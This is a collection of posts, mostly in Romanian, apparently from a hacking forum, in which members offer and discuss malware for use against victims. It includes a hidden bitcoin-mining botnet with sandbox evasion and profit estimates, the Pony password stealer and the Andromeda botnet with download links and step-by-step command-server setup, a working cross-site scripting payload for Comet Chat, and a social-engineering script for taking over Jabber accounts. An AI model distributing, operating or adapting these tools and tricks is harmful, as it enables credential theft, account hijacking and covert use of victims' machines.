B3st

@daatdraqq Pai nene, bin ul nu are nici un fel de mutex. Daca il deschizi de 15 ori se fute pc ul la lume rapid. Tre' sa fac un fel de mutex, nu am cum sa setez mutex in 'remote process' .. probabil prin shellcode s-ar putea face ..

Damn it, parola e: RIP ISR

@chill_toica Exchanger ul oficial pt bitcoin este: asta, vezi aici preturile

Mda, se pare ca era de la mpress. "Protejasem" clientu' cu mpress, iar asta crea eroarea aceea. Redownload, mersi lu' sandobot pentru report.

Versiunea anterioara Compatibilitate: windows xp, vista, 7, 8 pe x86 si x64. Marime server: 9 kb (compresat cu upx), server ul nu are dependinte (dll, framework, etc) m.jpg = ufasoft miner modificat de mine pentru a merge injectat, cryptat cu rc4. Miner ul descarca m.jpg, il decrypteaza si il injecteaza in memorie folosind parametri predefiniti, astfel server ul este total 'crypt-able'. +Anti sandboxie, vmware, anubis, virtualpc +Startup, melt, proxy. Facut in vb6, compilat cu linker ul de la vb2012 Note: 1. In principiu 1k boti genereaza intre 700 si 1.4k $ pe luna. 2. Fara rdp uri, au gpu praf. 3. Fara tari precum pakistan, afghanistan s.a.m.d (au componente proaste) 4. Proxy ul il folositi doar daca rulati server ul pe multe pc uri. 5. Server ul are mutex, ca sa functioneze trebuie sa activati melt + startup. Muie cu ciuperci: http://www.youtube.com/watch?v=l3EcbK1jKTE Updated: 01.25.2013 Download: RST Miner v2.1.rar Parola: rstforums.com Nu il puneti pe alte forumuri(=! english), altfel presupun ca bitcoin o sa fie picat destul de repede. Link "permanent": https://rstforums.com/proiecte/RST_Miner_v2.1.rar

Nu faci mai nimic cu pc urile din liceu, banuiesc ca au GPU uri proaste rau. In principiu, cu versiunea asta, cu 1k boti faci cam 700-1.3k $ pe luna.

Nu necesita, nici macar UAC.. absolut nimic. Ca la versiunea anterioara, m.jpg = ufasoft miner modificat de mine pentru a merge injectat. Plus, acel m.jpg este cryptat cu rc4 iar miner ul il injecteaza in memorie .. nu-l salveaza pe hdd. @djpliku Mersi pentru test. Mai trebuie un mic test pe vista & windows 8 x64 si ala e. Nu are de ce sa nu mearga .. dar totusi.

Versiunea anterioara: https://rstforums.com/forum/60066-rst-miner-v1.rst Am reusit sa-l fac sa mearga pe windows 7/8, dar mai trebuie testat .. Din cate stiu eu, asta' este primul bitcoin miner > ascuns + merge pe toate Windows NT(xp, vista, 7, 8) x86 & x64. Server mic, 9 kb care merge cryptat run-time .. spre deosebire de toate celelalte care nu merg cryptate. Mai am nevoie de cateva teste pe windows 8 x86 & x64 + windows xp/vista. Apoi o sa ramana de discutat cu admini daca il fac public sau nu, in cel mult 3-5 luni bitcoin va fi down daca ajunge pe mana la toti.

Mama, faza asta e de prin 2004 .. ma mir ca inca mai merge. Plus, tot ce am: laptop, telefon, tv, lcd & alte rahaturi le am de la tigani. Cand imi tre vreo noutate fix in cartier ma duc. Vouch for gipsy.

Nu prea sunt romani cu jabber ul, dar am zis ca merita tradus acest "tutorial". Multe servere de jabber nu cer un email pentru a te inregistra, drept urmare cu putin SE poti afla/schimba parola foarte usor. Mai precis: Trebuie sa faceti 2-4 conturi si sa adaugati victima in lista. Apoi pur si simplu intrati pe pagina respectivului server de jabber si le dati mail. "Salutari, As dori sa-mi schimbati parola acestui cont: gigi@jabbim.pl Am inregistrat acest cont pe server ul dumneavoastra in urma cu x luni, pentru a va dovedi ca acesta este contul meu uitati aici cateva din conturi din lista mea de contacte: vasile@jabber.ru, ion@jabbim.pl, ilie@thesecure.biz. Ultima data m-am logat pe acest cont in urma cu x ore/zile. Daca aveti nevoie de mai multe detalii spuneti-mi. Respect, gigi@jabbim.pl" De preferat faceti si un cont de mail "fake", de ex daca victima voastra are contu' de genu: gigi@jabbim.pl atunci faceti un cont: gigi@mail.ru. O mica lista cu servere unde merge aceasta metoda: @jabbim.cz @jabbim.com @jabbim.pl @jabbim.cz @jabbim.sk @njs.netlab.cz @jabster.pl @jabber.root.cz @jabber.at @thesecure.biz (could be harder, but still works) @jabber.org @draugr.de @xmpp.jp (i'm not sure about this) @twattle.net ..etc Sursa: http://trojanforge.com/showthread.php?t=2463

@bcman Ia ia tu kaspersky vs bitdefender in IDA pro/olly dbg/kernel detective .. porma vorbeste despre ce poate fiecare. Bitdefender este o cacanarie "a la rumanian".. nimic mai mult. De ex tu cand dai "scan with kaspersky" acesta iti executa fisieru' intr-un hidden sandbox si vede ce face, se creaza o detectie generica daca fisier ul respectiv face proceduri anale. Plus, kaspersky emuleaza multe functii, gen CopyFile/NtWriteVirtualMemory/etc .. de astea treci doar daca ai rootkit care sa blocheze access ul la aceste functii, iar dupa restart aceste folosite nu v-or mai putea fi emulate deci nu mai au cum sa te mai detecteze run-time. Cam asta este principiul unui rookit, blocheaza emularea unor functii de baza sau le muta la alte adrese in dll ul respectiv. Plus, faza cu certificatu' nici nu se poate aplica pe stuxnet.(certificat ul a fost pus ca altfel acel driver nu mergea pe x64) Din moment ce stuxnet ul are rootkit ring3, server ul va avea mai multe permisiuni decat orice antivirus .. nici nu are cum sa-l scoata antivirusi prin detectiile generice, ca n-au permisiuni. De aia au facut baieti un tool ca sa-i dea kill, acel tool presupun ca are la randu' lui un rootkit ring3 ca sa poata sa-i dea kill. Beat that ..

@kids Daca folositi kaspersky nici un astfel de malware nu poate sa va infecteze, doar daca are rootkit ring3/0. Dar voi folositi nod32/avira/bitdefender .. toate porcariile facute doar pentru marketing, nu si pentru securitate.

Dark.. in my ass, ala dupa dark e alt vacar. Asta era un gigel care lua tool uri de la rusi si le vindea la 'english people'(pe osc de ex) ..

http://www.7image.ru/pics/0113/331649179.png Asta da challange.

@Nytro De ce nu faci un cron job cu acele comenzi mysql, sa nu mai executi mereu manual. Sau poti mai simplu, sa modifici vbulletin ul pe partea de ip-get si sa-i dai valoarea dorita

Take it easy, ceea ce vezi tu aci' este public. Restu' tinem pentru noi

Ma scuzati ca va intrerup decernarea premiilor rst -best retards of the year. Dar de ce faceti mai nene proiecte apuse(copy paste uri) pe un forum de SECURITATE ? aka "the essence of the future is the digital core" >> in cazul vostru acel digital core in "future" va avea doar versiunea si numele modificat .. daca ma intelegeti.

CPM = click per moloz ?

############################# ##Discovered by: 001 ############################# ## 05.12.2012 ############################# ##Application: Comet Chat 4.4 ############################# ##hackyard.net and trojanforge.com ############################# cometchat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337 It may also work in comet chat 4.6 or other version, but i didn't tested. You need to make one new account in targeted website. Then you can use this xss like this: (toId = target id) Demo: http://www.opensc.ws/chat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337

http://www.youtube.com/watch?v=feuGs4ynwgs

Merry Christmas to Everyone! Panel looks like this: Builder: Purpose and Objectives of this project -Collecting FTP / HTTP passwords from 95 + popular FTP-client and Web-browser from infected computers. -Collecting E-mail password (POP3, IMAP, SMTP). -Collecting signing certificates of executable files and drivers. -Collect RDP(Remote Desktop Connection) passwords. -Invisible to the user's application. -Minimum amount of work and time grabber on the infected computer. Collect passwords from your computer and send them to c&c panel. Works on all versions of Windows, from Win98 to Windows 8(including windows server) - x86 and x64. Implemented instantaneous decoding for saved passwords for the following programs: System Info FAR Manager Total Commander WS_FTP CuteFTP FlashFXP FileZilla FTP Commander BulletProof FTP SmartFTP TurboFTP FFFTP CoffeeCup FTP / Sitemapper CoreFTP FTP Explorer Frigate3 FTP SecureFX UltraFXP FTPRush WebSitePublisher BitKinex ExpanDrive ClassicFTP Fling SoftX Directory Opus FreeFTP / DirectFTP LeapFTP WinSCP 32bit FTP NetDrive WebDrive FTP Control Opera WiseFTP FTP Voyager Firefox FireFTP SeaMonkey Flock Mozilla LeechFTP Odin Secure FTP Expert WinFTP FTP Surfer FTPGetter ALFTP Internet Explorer Dreamweaver DeluxeFTP Google Chrome Chromium / SRWare Iron ChromePlus Bromium (Yandex Chrome) Nichrome Comodo Dragon RockMelt K-Meleon Epic Staff-FTP AceFTP Global Downloader FreshFTP BlazeFTP NETFile GoFTP 3D-FTP Easy FTP Xftp FTP Now Robo-FTP LinasFTP Cyberduck Putty Notepad + + CoffeeCup Visual Site Designer FTPShell FTPInfo NexusFile FastStone Browser CoolNovo WinZip Yandex.Internet MyFTP sherrod FTP NovaFTP Windows Mail Windows Live Mail Becky! Pocomail IncrediMail The Bat! Outlook Thunderbird FastTrack Builder coded in delphi XE2, stub coded in asm(32 kb compressed). @HF Skids: Do NOT touch this bot if you are not good in linux, the panel has many dependinces. Download: Pony 1.9.rar (panel + builder + stub source) Pasw: TrojanForge.co //Doar alt copy & paste, poate va este folositor.

Se pare ca i-au mai dat +29 de zile ..

Sursa: HF Clar, in caz ca nu stiati pe mediafire poti sa schimbi fisierul iar link ul ramane acelasi. Deci omul intai il pune clean, porma dupa un timp ii da replace cu backdoor.

Neah, tre' sa dea chmod 777 la config.php si porma merge sa se logheze cu admin:admin Btw, am pus update ul la tutorial & builder.

Acest botnet este vandut pe forumuri rusesti pentru 1.5k. Optiuni: 1. Stabilitate incredibila, facut in asm. 2. Marime server: 13 kb (necompresat) 3. Nu foloseste dll uri pentru injectare/form grabber. 4. Form grabber: internet explorer, google chrome, firefox si opera (toate versiunile, prinde si ssl) 5. Socks4 6. Ring3 rootkit Hi, first let me clear something off As people didn't like the idea of being private, i was having intend by doing so it was meant for a test first i was going to public it some more days but seems like people are not patient. as you can see some people tried to piss me off to let me release it, i don't really give a damn care about the new version i was just trying to let them have a calm and understand the situation, because i already decided before to not work on Andromeda again sure RE is all about challenges but my challenge is not Andromeda again, all in all Andromeda is a nasty bot i don't like it, it costs more time than other bots because it is not a simple text to change so you have to know what you are doing otherwise you will stuck. People just don't understand, it is not a simple task, i had to write nearly 600 lines of code to get this done so it is not easy as it may seem to be. I never say something i am not sure of, if i was not have the knowledge to do it then i would not say i can do it. Anyway here is my builder hope you enjoy it. How to set up it: 1. Upload /Panel files to androhost.com/andro 2. Create one mysql db. 3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory. 4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory 5. Open in your browser androhost.com/andro/index.php?act=install. 6. Login with default creditials: admin:admin 7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6 8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install' 9. After installation is done open in your browser androhost.com/andro/ifg.php 10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz 11. Open Builder.exe > change host to: http://androhost.com/andro/image.php and build your bin. 12. For enable plugins just go in panel > menu > tasks > add task Task type = Install plugin Url= http://androhost.com/andro/r.pack Click 'Enabled' and add your task, do the same for each plugin. Enjoy it Download: Andromeda v2.06.rar Pass: TrojanForge.co